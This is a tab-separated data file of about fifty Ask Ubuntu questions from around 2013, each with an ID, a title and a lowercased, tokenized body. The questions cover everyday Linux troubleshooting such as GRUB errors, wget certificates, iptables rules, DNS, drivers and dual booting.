324765	too much disk read/write when launching an application	i have xubuntu 13.04 on an old dell inspiron with 1 gb ram and about 2 gb swap . each time i launch an application ( e.g . thunar or evince ) it takes a pretty long time to be launched and i see a lot of disk reads/writes . if the system was short on memory , this would be understandable as the system would use swap . but that 's not the case in my situation ( i.e . i have this problem even when the ram is almost empty ) . i had the same problem with this laptop with an older version of ubuntu as well . maybe the problem is with the old ata drive ?
324768	chromium prediction service not working in ubuntu 12.04 ?	chromium omnibar does n't show prediction whenever i type something . i checked the settings , prediction service is checked there .
324772	can not delete a tar.bz2 file from pendrive	i want to delete a tar.bz2 file from my pendrive . i tried shift+delete , but nothing happened . then in terminal i tried sudo rm command , i got the following error - rm : can not remove `avi.tar.bz2 ' : read-only file system i tried sudo chmod 777 , but the output is - chmod : changing permissions of `avi.tar.bz2 ' : read-only file system i am not able to remove the tar.bz.2 file . any help ?
324773	drivers for hp pavilion dv7-3165dx	hello i am installing ubuntu on my hp pavilion dv7-3165dx laptop and was curious if there were drivers compatible with my laptop i did some searching and came up with nothing ... the biggest things for me are the integrated webcam and wireless adapter drivers , as i am currently deployed in afghanistan and i have a baby on the way back home so i very much need to talk to my lovely wife . i just did the install and my graphics driver seems to be fine the only other problem i am having is with my wireless adapter it does n't work so i assume ill need some kind of driver for it , after that i should be set to update and download drivers as needed from there . it looks like im running a qualcomm atheros ar9285 802.11b/g/n wifi adapter . sorry if my question was kind of vague , and thanks for any help thanks everyone jake
324778	how can i create a bootable iso from an extracted ubuntu 13.04 iso ?	i have an extracted copy of ubuntu 13.04 iso ( live cd ) , but if i burn it directly it will not boot . is there any way to create a bootable iso so that i can burn it to a dvd or usb flash drive ? i tried iso master , but it first wanted an iso and allows me to add some more files . can i use it to create iso only from extracted folders ?
324784	change color of top menubar / statusbar	i know there are a million posts on this but not a single one has helped me solve this ... i 'm trying to change the color of the top menubar/status bar of the system . i 've managed to set the transparacy of it using some fancy commands in the terminal but trying to change the actual color is a nightmare . it just stays black ! i 'm trying to set it to white . i 've tried modifying the unity.css file of the theme i 'm using by setting the @ dark-bg-color and @ dark-fg-color values but all that seem to do is change the menu colors of the windows that open up for each program , not the actual status bar of the system .
324790	how do i switch from ubuntu to lubuntu ?	i have an installation disc of ubuntu 12.04 but now i need to install lubuntu 13.04 . what are the steps to be followed ?
324792	asking authentication when connecting to windows share	we are using ubuntu clients in my company ... recently i have updated the clients from ubuntu 11.04 to ubuntu 12.04.. i have done the following installed ubuntu 12.04 installed latest updates installed likewise open join ubuntu clients to windows domain given admin rights to windows user in sudoers file we are able to login with domain\user1 successfully.. but my problem is , when am connecting to windows share folder which is shared as every one.. it is asking for authentication.. when we give domain\user1 and password , it is opening ... i have already login with domain\user1 ... and why it is asking for authentication ? in the previous version which am using ( ie 11.04 ) this problem is not there ... in 11.04 when am login with domain\user1 it opens windows share directly with out asking any authentication ... . please help me on this ...
324795	how to remove unused application from the menu but not completely uninstall it on 12.04 lts	what i wan na do is not to uninstall certain apps but to completely hide it . for example i 'm using vlc i did n't want to uninstall the default movie player , but i did n't want to have it run my videos either . the problem with this app was that even if vlc was set as default video player on double click movie player started to play videos . my solution for above mentioned problem was right click on video , properties tab , choosing vlc from list of recommended apps and setting it as default choice , however i had to repeat it different times ( for each video type ) any suggestions how to force system to use my choice of apps . something more global as solution where i do n't have to do workarounds but just set my system to use the apps i want .
324796	after update ubuntu 13.04 my pc does n't show the dock bar wo n't show	after update ubuntu 13.04 which is freshly installed , not showing dock bar and upper bar which is really annoying . i reinstall ubuntu 3rd time , but every time the problem happens . i do n't know whether it 's a bug or not , just showing an internal error occurred . please some one help me .
324805	how to launch dropbox using its python script normally ?	i 've installed dropbox_2.2.10.tar.gz . its installation instruction says : `` download this python script to control dropbox from the command line . for easy access , put a symlink to the script anywhere in your path '' where should i put the script to run dropbox like other software which run from the terminal and the dash ?
324806	same keyboard layout , different outputs for different languages	i have a uk keyboard , so uk-english layout need to type portuguese and german characters ( e.g . á , ã , ä ... ) do n't want to buy a new keyboard do n't want to change keyboard layout ( standard ubuntu functionality ) why not ? because i do n't want to constantly `` try to remember '' where each key is ; i most definitely do n't want to print a layout map either ! i want to press 'a and get 'a when language is english or german and á when portuguese ; currently , to get á in portuguese i need to press [ a this is possible/standard in windows since 98 ( to my knowledge ) i 'm aware of the following question , but it did n't help me : how to use an input language different from the keyboard layout country and from the system language ? why not ? because it suggests to change the keyboard layout , which is what i strictly want to avoid so is it possible to achieve different outputs while maintaining the underlying keyboard layout ( to match its physical layout ) ?
324807	lightdm does n't load on boot	i 'm using ubuntu 13.04 and since yesterday lightdm does n't load on boot . ubuntu loads normally but there is no ui just this cursor _ blinking . i tried in console ( ctrl + alt + f4 ) : sudo service lightdm start & sudo start lightdm nothing happens . then i realized that x11 wont start and i reinstalled it and it did n't fix the problem .
324808	apt-get fails any install : `` dpkg : error processing grub-pc ''	when installing any program with apt-get install , i get the following error : generating grub.cfg ... /etc/grub.d/00_header : 234 : /etc/grub.d/00_header : bad substitution dpkg : error processing grub-pc ( -- configure ) : subprocess installed post-installation script returned error exit status 2 so i had a look at /etc/grub.d/00_header , line 234 is `` cat < < eof '' . make_timeout ( ) { cat < < eof if [ `` \ $ { recordfail } '' = 1 ] ; then set timeout= $ { grub_recordfail_timeout:0 } else set timeout= $ { 2 } fi eof } i also found that in /boot/grub , there are two relevant files : ll /boot/grub/grub* -r -- r -- r -- 1 root root 4247 jul 26 09:57 /boot/grub/grub.cfg -r -- -- -- -- 1 root root 1293 jul 26 09:57 /boot/grub/grub.cfg.new the grub.cfg.new file ends on the following line ( 59 ) : terminal_output gfxterm while grub.cfg has the following content from line 59 : terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=2 fi # # # end /etc/grub.d/00_header # # # the set timeout tells me this grub.cfg.new file was being compiled from the 00_header file . so it looks like something is stopping dpkg from compiling the header into the new grub.cfg file . the process stops , leaving the unfinished grub.cfg.new file . how can i fix this error ?
324816	wget does n't accept google 's certificate	i use wget in a cron job to download my google calendar . i know it was still working last week . today i noticed it does n't anymore . wget wo n't accept google 's certificate : $ wget -- debug https : //www.google.com/calendar/ical/ < private-id > /basic.ics > debug output created by wget 1.12 on linux-gnu . -- 2013-07-26 12:36:31 -- https : //www.google.com/ resolving www.google.com ... 109.105.109.234 , 109.105.109.223 , 109.105.109.208 , ... caching www.google.com = > 109.105.109.234 109.105.109.223 109.105.109.208 109.105.109.249 109.105.109.229 109.105.109.219 109.105.109.245 109.105.109.227 109.105.109.240 109.105.109.230 109.105.109.241 109.105.109.212 109.105.109.251 109.105.109.216 109.105.109.238 109.105.109.218 2a00:1450:400f:803 : :1012 connecting to www.google.com|109.105.109.234|:443 ... connected . created socket 3 . releasing 0x09046cf8 ( new refcount 1 ) . initiating ssl handshake . handshake successful ; connected socket 3 to ssl handle 0x09047090 certificate : subject : /c=us/st=california/o=google inc/cn=google.com issuer : /c=us/o=google inc/cn=google internet authority error : certificate common name `google.com ' does n't match requested host name `www.google.com ' . to connect to www.google.com insecurely , use ` -- no-check-certificate ' . closed 3/ssl 0x09047090 so wget does n't want to match google.com with www.google.com . which is weird . the certificates seem to be fine . curl is working : curl -v https : //www.google.com/calendar/ical/ < private-id > /basic.ics * about to connect ( ) to www.google.com port 443 ( # 0 ) * trying 109.105.109.219 ... connected * connected to www.google.com ( 109.105.109.219 ) port 443 ( # 0 ) * successfully set certificate verify locations : * cafile : none capath : /etc/ssl/certs * sslv3 , tls handshake , client hello ( 1 ) : * sslv3 , tls handshake , server hello ( 2 ) : * sslv3 , tls handshake , cert ( 11 ) : * sslv3 , tls handshake , server key exchange ( 12 ) : * sslv3 , tls handshake , server finished ( 14 ) : * sslv3 , tls handshake , client key exchange ( 16 ) : * sslv3 , tls change cipher , client hello ( 1 ) : * sslv3 , tls handshake , finished ( 20 ) : * sslv3 , tls change cipher , client hello ( 1 ) : * sslv3 , tls handshake , finished ( 20 ) : * ssl connection using ecdhe-rsa-rc4-sha * server certificate : * subject : c=us ; st=california ; l=mountain view ; o=google inc ; cn=www.google.com * start date : 2013-07-12 08:56:36 gmt * expire date : 2013-10-31 23:59:59 gmt * subjectaltname : www.google.com matched * issuer : c=us ; o=google inc ; cn=google internet authority * ssl certificate verify ok. > get /calendar/ical/ < private-id > /basic.ics http/1.1 > user-agent : curl/7.21.6 ( i686-pc-linux-gnu ) libcurl/7.21.6 openssl/1.0.0e zlib/1.2.3.4 libidn/1.22 librtmp/2.3 > host : www.google.com > accept : */* > < http/1.1 200 ok < expires : fri , 01 jan 1990 00:00:00 gmt < date : fri , 26 jul 2013 10:42:18 gmt < content-type : text/calendar ; charset=utf-8 < cache-control : no-cache , no-store , max-age=0 , must-revalidate < pragma : no-cache < x-content-type-options : nosniff < x-frame-options : sameorigin < x-xss-protection : 1 ; mode=block < server : gse < transfer-encoding : chunked < ... it 's not terrible , i can just use curl instead . but still - why is n't it working ? my system is : $ wget -- version > gnu wget 1.12 built on linux-gnu . +digest +ipv6 +nls +ntlm +opie +md5/openssl +https -gnutls +openssl -iri wgetrc : /etc/wgetrc ( system ) locale : /usr/share/locale compile : gcc -dhave_config_h -dsystem_wgetrc= '' /etc/wgetrc '' -dlocaledir= '' /usr/share/locale '' -i . -i../lib -g -o2 -dno_sslv2 -d_file_offset_bits=64 -o2 -g -wall link : gcc -g -o2 -dno_sslv2 -d_file_offset_bits=64 -o2 -g -wall -wl , -bsymbolic-functions /usr/lib/libssl.so /usr/lib/libcrypto.so -ldl -lrt ftp-opie.o openssl.o http-ntlm.o gen-md5.o ../lib/libgnu.a copyright ( c ) 2009 free software foundation , inc. license gplv3+ : gnu gpl version 3 or later < http : //www.gnu.org/licenses/gpl.html > . this is free software : you are free to change and redistribute it . there is no warranty , to the extent permitted by law . originally written by hrvoje niksic < hniksic @ xemacs.org > . currently maintained by micah cowan < micah @ cowan.name > . please send bug reports and questions to < bug-wget @ gnu.org > . $ uname -a > linux andreee 3.0.0-32-generic # 51-ubuntu smp thu mar 21 15:51:26 utc 2013 i686 i686 i386 gnu/linux $ lsb_release -a > no lsb modules are available . distributor id : ubuntu description : ubuntu 11.10 release : 11.10 codename : oneiric
324817	ca n't switch on 3g modem at network manager	how can i switch on my modem at network manager , i have prolink phs100 gsm 3g modem which works well on ubuntu 12.04 but when plugged in to my laptop which use ubuntu 13.04 it does n't work with same setting in ubuntu 12.04 . after i click on the modem said `` you now connected to gsm network '' but there is no internet connection . then i go to network manager , on mobile broadband option i ca n't switch to on , it always switch back to off mode . info : my laptop is acer aspire s3-951 please help , thanks
324818	correct way to install virtual dependency	i 'm in the process of creating a .deb package of our java-based application ( see this superuser-question ) . i 'm now using following dependency information : depends : java-runtime-headless ( > = 1.6 ) recommends : openjdk-7-jre-headless , ... now i 'm trying to install it : $ sudo dpkg -i myapp.deb selecting previously unselected package myapp . ( reading database ... 140874 files and directories currently installed . ) unpacking myapp ( from myapp.deb ) ... dpkg : dependency problems prevent configuration of myapp : myapp depends on java-runtime-headless ( > = 1.6 ) ; however : package java-runtime-headless is not installed . dpkg : error processing myapp ( -- install ) : dependency problems - leaving unconfigured processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... errors were encountered while processing : myapp $ ok , i 'm trying to install the dependency : $ sudo apt-get install java-runtime-headless reading package lists ... done building dependency tree reading state information ... done package java-runtime-headless is a virtual package provided by : openjdk-7-jre-headless 7u25-2.3.10-1ubuntu0.12.04.2 openjdk-6-jre-headless 6b27-1.12.6-1ubuntu0.12.04.2 gcj-jre-headless 4:4.6.3-1ubuntu5 gcj-4.6-jre-headless 4.6.3-1ubuntu2 default-jre-headless 1:1.6-43ubuntu2 you should explicitly select one to install . e : package 'java-runtime-headless ' has no installation candidate ok , i chose one of these packages : $ sudo apt-get install openjdk-7-jre-headless reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : openjdk-7-jre-headless : depends : openjdk-7-jre-lib ( = 7u25-2.3.10-1ubuntu0.12.04.2 ) but it is not going to be installed depends : ca-certificates-java but it is not going to be installed depends : tzdata-java ( > = 2012e-0ubuntu0.12.04.1 ) but it is not going to be installed depends : java-common ( > = 0.28 ) but it is not going to be installed depends : libnss3-1d ( > = 3.12.9+ckbi-1.82-0ubuntu4 ) but it is not going to be installed recommends : icedtea-7-jre-jamvm ( = 7u25-2.3.10-1ubuntu0.12.04.2 ) but it is not going to be installed myapp : depends : java-runtime-headless ( > = 1.6 ) recommends : mercurial but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . now it only suggests me to remove my application : $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages will be removed : myapp 0 upgraded , 0 newly installed , 1 to remove and 3 not upgraded . 1 not fully installed or removed . after this operation , 41.0 mb disk space will be freed . do you want to continue [ y/n ] ? n abort . $ it looks like i first need to install the dependency ( openjdk-7-jre-headless ) and then my application . how a normal user should understand that ? or is there a better way to install myapp.deb ?
324821	xbox 360 gameplay recording	hi i have a climax digital vcap 303 , its a av recorder for my xbox 360 . i currently have be using arcsoft showbiz to record ( capture ) my xbox 's gameplay . this app is window/mac only . is there any programs that i could use to capture my gameplay on ubuntu ?
324822	setting up catch-all with iptables	i 'm trying to setup a iptables which only allows traffic in via ssh and a catch all that blocks everything else coming into computer . the iptables -l output looks like this chain input ( policy accept ) target prot opt source destination accept tcp -- anywhere anywhere tcp dpt : ssh drop all -- anywhere anywhere chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination the above appears to block anything coming into the computer except for ssh , however , it also seems to block returning traffic from an outgoing request . i.e . if i try to ping www.google.com it seems to time trying to resolve dns . i 'm assuming my drop all blocking the response from the dns request . can anyone direct me how to setup the catch-all correctly to allow returning traffic back in ? thank you , matthew
324824	install ubuntu 13.04 alongside windows 8	currently i am using windows 8 in my dell n4050 machine . it has 4gb of ram , 320gb hdd . now i want to install ubuntu 13.04 alongside windows . i tried several times after reading some blogs . but every time i failed . i downloaded ubuntu 32bit from the official site and made my pendrive into bootable device using universal-usb-installer-1.9.3.7.exe . i could not burn a dvd and boot from it because my dvd drive is not working somehow . by the way , i did all the normal stuff what is needed for installing ubuntu . in installation process install ubuntu alongside windows 8 should have appeared but i just saw replace ubuntu with windows 8 and something else . then i tried going with something else , i did not see such option where i can chose to use ubuntu alongside windows .
324828	windows xp wo n't load after installing ubuntu 12.04	i am a newbie and just installed ubuntu 12.04 lts . instead of using the automatic dual boot option , i installed it manually on the partition made for it , but now only ubuntu loads up with no option to boot windows xp . pressing f8 does n't help either .
324842	server in lan with two network cards , ca n't telnet / ping to the second even if it works	i have an issue with an ubuntu 12.04 lts ( updated ) server . for reasons too long to detail , it has got one eth0 interface assigned to 192.168.1.9 and one wlan0 interface assigned to 192.168.1.10 . both must work since boot time . i also installed ( i need of monitoring software ) lubuntu desktop-core and removed network manager ( rebooted ) and using wpa_supplicant + /etc/network/interface hardcoded configuration and fixed ips . everything works like a charm . from the lubuntu desktop i can browse the internet from eth0 , i can unplug it and browse internet through wlan0 edit : i must ifdown eth0 for that to happen but even then , i can use the server and browse internet with it but not contact it from other computers i can ping and ssh this server eth0 from another computer just fine . however - and this is my issue - i can neither ping nor ssh to this server wlan0 . i thought it was some routing issue , but even commenting out the eth0 stanza in interfaces i still can not access the server from the outside . of course if i go on the server and try pinging ( both from console and desktop ) or navigating internet , it works perfectly . do you have any idea about where i could start look after ? once i return to work i 'll post my interfaces file , it 's pretty standard and no dhcp involved ( both interfaces have static ip as described above ) . details on the configs that have been asked to provide : ifconfig : lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:18 errors:0 dropped:0 overruns:0 frame:0 tx packets:18 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1613 ( 1.6 kb ) tx bytes:1613 ( 1.6 kb ) wlan0 link encap : ethernet hwaddr 00 : c0:49 : fc : db:3f inet addr:192.168.1.10 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :2c0:49ff : fefc : db3f/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:16376 errors:0 dropped:0 overruns:0 frame:0 tx packets:3337 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:4675792 ( 4.6 mb ) tx bytes:543084 ( 543.0 kb ) when i enable the eth0 with ifup , i get this stanza added : eth0 link encap : ethernet hwaddr 00:0e : a6 : aa:5b : be inet addr:192.168.1.9 bcast:192.168.1.255 mask:255.255.255.0 up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) route -n : kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 100 0 0 wlan0 192.168.1.0 0.0.0.0 255.255.255.0 u 0 0 0 wlan0 192.168.1.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 if i disable eth0 of course the relevant line goes away . iptables shows clean , i am using ufw and i have disabled it at the moment as well iptables -l -nv : chain input ( policy accept 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination chain forward ( policy accept 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination chain output ( policy accept 0 packets , 0 bytes ) pkts bytes target prot opt in out source destination
324843	can i install this driver ?	i have an ati xpress 200 graphics card , it does n't have support from amd anymore so i ca n't upgrade to ubuntu 12.10 , but i found this driver on their site driver download . i know it does n't support my graphics card but should i take the risk and install so i can upgrade to 12.10 ? update : i have an issue with the reboot which finishes the upgrade . i press the reboot button and then my pc reboots : i see the bios , then my sreen turns purple and then black and my monitor says that it gets no signal and the hard drive led light stops flashing
324845	what 's the difference between apt-get install and apt-get build-dep ?	on the apt-get man 's page , one can find this : install pkg ( s ) this option is followed by one or more packages desired for installation . each package is a package name , not a fully qualified filename ( for instance , in a fedora core system , glibc would be the argument provided , not glibc-2.4.8.i686.rpm ) . all packages required by the package ( s ) specified for installation will also be retrieved and installed . [ ... ] build-dep source_pkg causes apt-get to install/remove packages in an attempt to satisfy the build dependencies for a source package . it sonds like both of those are trying to satisfy dependencies , but i had different results while installing matplotlib with each of those : apt-get intall did n't work with my subsequent pip install matplotlib in my virtualenv , while apt-get build-dep did* . * yeah , i needed to install matplotlib in a venv , but pip could n't resolve some of the dependencies , so i lazily used apt in order to solve it
324851	how to use a zte mf 190 dongle in ubuntu	how can i use a zte mf 190 usb dongle in ubuntu 12.10 ? the connection manager in the device memory runs only in windows . is there a connection manager for ubuntu ? please help !
324852	network manager not picking up vpn 's nameservers	so i installed ubuntu 13.04 ( switch from fedora ) two days ago and i 'm almost productive again except for one thing : when i connect to my work 's vpn , network manager does n't pick up the nameservers like fedora did . when i connect i can ping the ip addresses directly : $ ping source.my-company.com > ping : unknown host source.my-company.com $ ping 123.45.67.890 > 64 bytes from 123.45.67.890 : icmp_req=2 ttl=64 time=67.8 ms > ... what 's more irritating is that i can easily ping the nameservers too . my network guy wants me to manually edit resolv.conf , but that 's not sustainable since i regularly switch between 3 vpns . ( another source of irritation for another day : fedora allowed me to connect to multiple vpns , why wo n't ubuntu ? ) my question is how do i begin to debug this ? i 'm unfamiliar with dns and networking in general , and using new tools makes it harder to figure out .
324858	installed jdk by and have error : could not create the java virtual machine	i am getting my new laptop going and went to install the latest oracle jdk 7u25 . i followed the instructions on this site to do it . afterwards when i type java -- version in the terminal i get the error : error : could not create the java virtual machine i tried reinstalling it via a different method but the error wont go away . i am running ubuntu 12.04 64bit .
324859	problems integrating unity login with active directory	i 'm using winbind to authenticate against active directory . i 've followed the example here : http : //serverfault.com/questions/135396/how-to-authenticate-linux-accounts-against-an-active-directory-and-mount-a-windo to get active directory integration working . ( with the exception of mounting a windows share which i do n't need ) . i 've also followed the steps to create a home directory and groups for ad users : https : //help.ubuntu.com/community/ldapclientauthentication # automatically_create_home_folders https : //help.ubuntu.com/community/ldapclientauthentication # assign_local_groups_to_users i can log in an ad user using a text-based login prompt , but when i try to login using the gui it just leaves me at the login prompt . i know it 's authenticating because it prints a password expiry warning , but the login box never goes away . would appreciate some advice on where i should look to work out why it 's failing .
324860	turn off bluetooth on wakeup from sleep and boot automatically	so i 'm running ubuntu 12.04 on a samsung series 7 chronos laptop . it has i7 cores and nvidia optimus graphics and , needless to say being samsung , a number of bugs to go along with it . basically every time i close the lid for two minutes and open it back up and wake it from suspend , bluetooth has been re-enabled and i have to disable it again to save on battery . is there a terminal script i can run or a file i can edit to boot with it disabled and keep it disabled on wakeup and login ? thanks in advance , jack
324862	ctrl+a does not select all in url bar in chrome and firefox	selecting all text in url by ctrl+a does n't work anymore . now it brings the cursor to the front .
324868	firefox does n't connect to internet	suddenly firefox randomly does n't connect to the internet . i can ping stuff , and i can access sites through chromium . there was an update through ubuntu manager before that , i 'm not sure if it had anything to do with it . i restarted just in case , but nothing happened . i went in error console : error tab timestamp : 07/26/2013 04:44:00 pm error : this.docshell is null source file : chrome : //global/content/bindings/browser.xml -- -- -- -- - line : 323 messages tab could not read chrome manifest 'file : ///usr/lib/firefox/browser/extensions/ % 7b972ce4c6-7e08-4474-a285-3208198ce6fd % 7d/chrome.manifest ' . while creating services from category 'profile-after-change ' , service for entry 'updatenotifier ' , contract id ' @ ubuntu.com/update-notifier ; 1 ' does not implement nsiobserver . 1374846512577 services.healthreport.healthreporter warn no prefs data found . warnings tab a lot of `` declaration dropped '' items actually while i was writing this it connected to my homepage , but as soon i restarted firefox , the same thing happened . so it connects after about 5 minutes for some reason ? i tried purge and install firefox , but it did n't work .
324869	windows xp wont load after installing ubuntu	i installed ubuntu alongside with xp . but the standard dual boot was n't allowing me due to several partitions . so i installed it manually using the do something else option . now everything said and done when i try to select windows from grub it does n't boot it just shows a blank screen with a blinking icon . have no idea what to do
324870	firefox keeps crashing usually with flash / youtube	this problem has been raised before can someone from the ubuntu team please help ? or suggest alternative browser since chrome does the same . thanks - dev
324871	how to compile a python file ?	i have started learning python and i 'm also a new user to ubuntu . i need to know the ways of compiling the .py files ... ... .i have tried with the command python `` hello.py '' what are the other ways of compiling python ? please help me
324872	ub 12.04 desktop - system update server main vs uk and dns	i am very new to ubuntu : ) i recently installed ubuntu desktop 12.04 - my system detected ( correctly ) that i am resident of the united kingdom and so it/i set my update server to the united kingdom server . however , this was not a good choice for the following reason : according to the uk update server my system requires some 270 updates . however , when i try to install them i receive the message that `` these updates would be from unauthenticated sources '' and then refuses to install any updates . i did some reading and found that it is recommended i use the `` main '' server for updates , so i changed to `` main '' and ran the update process again , only to find that my system is fully up to date and there are zero outstanding updates to apply to my system . ok .. so that solved something which really should not be a problem in the first place . it would be nice to see the uk update server bought `` up to date '' . ( some technical irony here , for those who noticed ) so , i moved on to my next task .. however , since changing to the `` main '' server for updates my system is no longer respecting my dns setting and so i can not continue . my dns setting is set to a local ( intranet dns server ) located on my local subnet ( ie 192.168.1.11/32 in this case ) , however , when i try to run the update process ( or any sudo apt-get process ) my system starts trying to connect to dns servers outside of my lan . due to technical policies , i have been given temporary egress to these external dns servers . what i would like to know is : is it possible to force all ubuntu dns requests to respect the dns server configured by my network settings . ie . all dns requests go to my lan dns server at 192.168.1.11 thankyou .
324879	firefox and codeblocks problems	ubuntu is constantly crashing with programs like codeblocks and firefox . with firefox it just goes slightly dark and after 6-7 seconds it 's running again . but in code-blocks it just crashes . i tried reinstalling codeblocks but it did n't work .
324881	how to open a window without `` close '' button ?	in a script i want to open a window which is missing the `` close '' button in the title bar , so that it ca n't be accidentally be closed , but still has the `` minimize '' and `` maximize '' buttons . is this possible ? maybe via some window manager arguments ? i 'm using ubuntu 13.04 with unity .
324884	adding nameserver in resolv.conf	im using ubuntu server edition . in that it 's configured to use ip address provided by dhcp . now , i want to edit the resolv.conf file so that it points to the nameservers that i want to define . obviously editing the resolv.conf file directly will not work as the changes will get overwritten . i also tried a different approch to edit /etc/resolvconf/resolv.conf.d/head and adding nameserver entries there that worked for me but it is said that it is not recommended . so i want to know how can i add nameserver entries if my machine is configured to use dhcp . i believe i will have to edit /etc/network/interfaces i tried a lot of tricks but nothing seems to work . please help . also is this possible to add nameserver if using dhcp ? thanks .
324888	very old ubuntu release. , want to override	i installed an ubuntu release 3-4 years ago in my asus eeepc , and now i want a clean installation of the latest ubuntu release since i got lot of problems ( i can not not even connect to my wifi lan at home ) . i downloaded the .iso file into a usb but the eeepc can not boot from the usb , could you please help ? thanks !
324889	multimedia running very slow & weird ( in virtualbox )	i 've got ubuntu precise ( 12.04.2 ) running via virtualbox on windows 7 host machine ( both 64 bit systems ) - intel i3 2350m with 4gb of ram - 1.5 gb allocated to virtualbox . all multimedia played on ubuntu is very slow and what is most disturbing - audio is played in very weird way - bassy , sound like alien : ( virtualbox uses windowsdirectsound ich ac97 , 32 megabytes of video memory ( intel hd3000 ) any ideas how to fix it ? -- edit install also lubuntu 12.04 , same problem
324891	installed avast ! in pangolin	what will avast ! do after installed in pangolin ? firstly , i think avast ! will do the same thing as it did in windows . * automatically updated * automatically scan every device , which plugged via usb but my ubuntu avast ! do nothing . is it normal ? or what should i do to make it works ? please guide me ... nb : i just installed > update > and do scan manually .
324896	dvd drive error in ubuntu 11.10	my ubuntu 11.10 dvd does not refresh the disc contents if a new disc is inserted , it keeps on showing the contents of the previously removed disc as if it has kept the contents in a buffer.what is to be done ? regards and thanks . ps : -i have upgraded the kernel to version 3.2 and i know that 11.10 is not supported anymore
324898	no wired or wireless networking available on ubuntu 12.04 ( wired work from liveusb )	i 've just installed 12.04 in a dual boot with vista via a liveusb . when i booted to the liveusb wired networking worked out of the box , and wireless networking did n't work . now that i 've installed 12.04 on a partition on the harddrive i ca n't get wired or wireless networking to work . any suggestions as how to how i should go about fixing this ? the output of sudo lshw -c network is : *-network description : network controller product : bcm4311 802.11b/g wlan vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0c:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=wl latency=0 resources : irq:17 memory : fe8fc000-fe8fffff *-network unclaimed description : ethernet controller product : bcm4401-b0 100base-tx vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 version : 02 width : 32 bits clock : 33mhz capabilities : pm cap_list configuration : latency=64 resources : memory : fe5fe000-fe5fffff
324901	setting up /etc/network/interfaces for sandboxed network with 12.04 lts	i am trying to set up ubuntu 12.04 as a router so i can isolate an ip subnet . for the isolated subnet , connections are only allowed via port forwarding . other than that , neither inbound nor outbound connections will be allowed . ( i intend to use shorewall rather than mess with netfilter and iptables myself , if it matters . ) yesterday i tried a number of possibilities in my /etc/network/interfaces and could n't even get the machine to not pause during booting , much less work . i will admit i did enable forwarding in the kernel , but i would n't expect that to break this . here 's what i tried : auto lo iface lo inet loopback # net - internet and normal cs network # netmask 255.255.0.0 # explicitly listing this slowed down boot ? auto eth0 iface eth0 inet # loc - this is the security class network ( sandbox ) # for simplicity we set it up as full 172.16.0.0/12 # took out auto because might be causing delay on boot ; restore when fast . # iface eth1 static # address 172.16.1.1 # netmask 255.240.0.0 # broadcast 172.31.255.255 the commented lines show options i tried initially , then dropped when the machine still would n't boot without the full minute networking pause . i checked kern.log , and it basically says the network process terminated with status 1 , which was n't terribly helpful . should i disable network manager ? what should i have in my file ? do i even need anything in this file other than the default , or is it just for ifup/ifdown ? a diagram of my network is attached . sorry about the messiness ; it was intended for my own consumption and evolved over time . my ubuntu machine is the `` fw '' ( firewall ) machine in between the networks , and it has a separate nic on each network . i am now setting up a new machine from scratch in case that 's easier .
324903	installing downloaded python modules	how can i move downloaded python modules to my python directory ?
324904	eclipse stays in waiting to install state in the software center	i downloaded eclipse from software center but after the download , it says waiting to install . i am totally confused . it should have installed after download according to all sources but it is n't . what seems to be the problem ? thanks for the help in advance .
324908	brightness reduced after installation	after installing ubuntu 13.04 the display brightness of my laptop has reduced . increasing the brightness in system settings makes no change . can you help me tackle this problem ?
324918	problem in uninstalling ubuntu 12.04	i installed ubuntu 12.04 using wubi . but there is no application named `` uninstall-ubuntu `` . now how can i uninstall it ?
324928	how to install db2-client on ubuntu 12.04 lts ?	on rhel desktop : rpm -aq | grep db2 db2-client-9.7-1.x86_64 there is the db2-client package , ok . but how can i install db2-client to ubuntu 12.04 lts desktop ? http : //packages.ubuntu.com/ did n't gave anything related .
324930	question about the symlink of the ln command	can anybody give me an example why should we use the symlink kind of the `` ln '' command between files ? i know that when you create symlink file , that file size is very small and it redirect to the main file . the problem is when i created the symlink from a specific file ( text file ) from another directory , but i ca n't cat , less or any kind of print and view that file . pls help me understand more about this type . thanks .
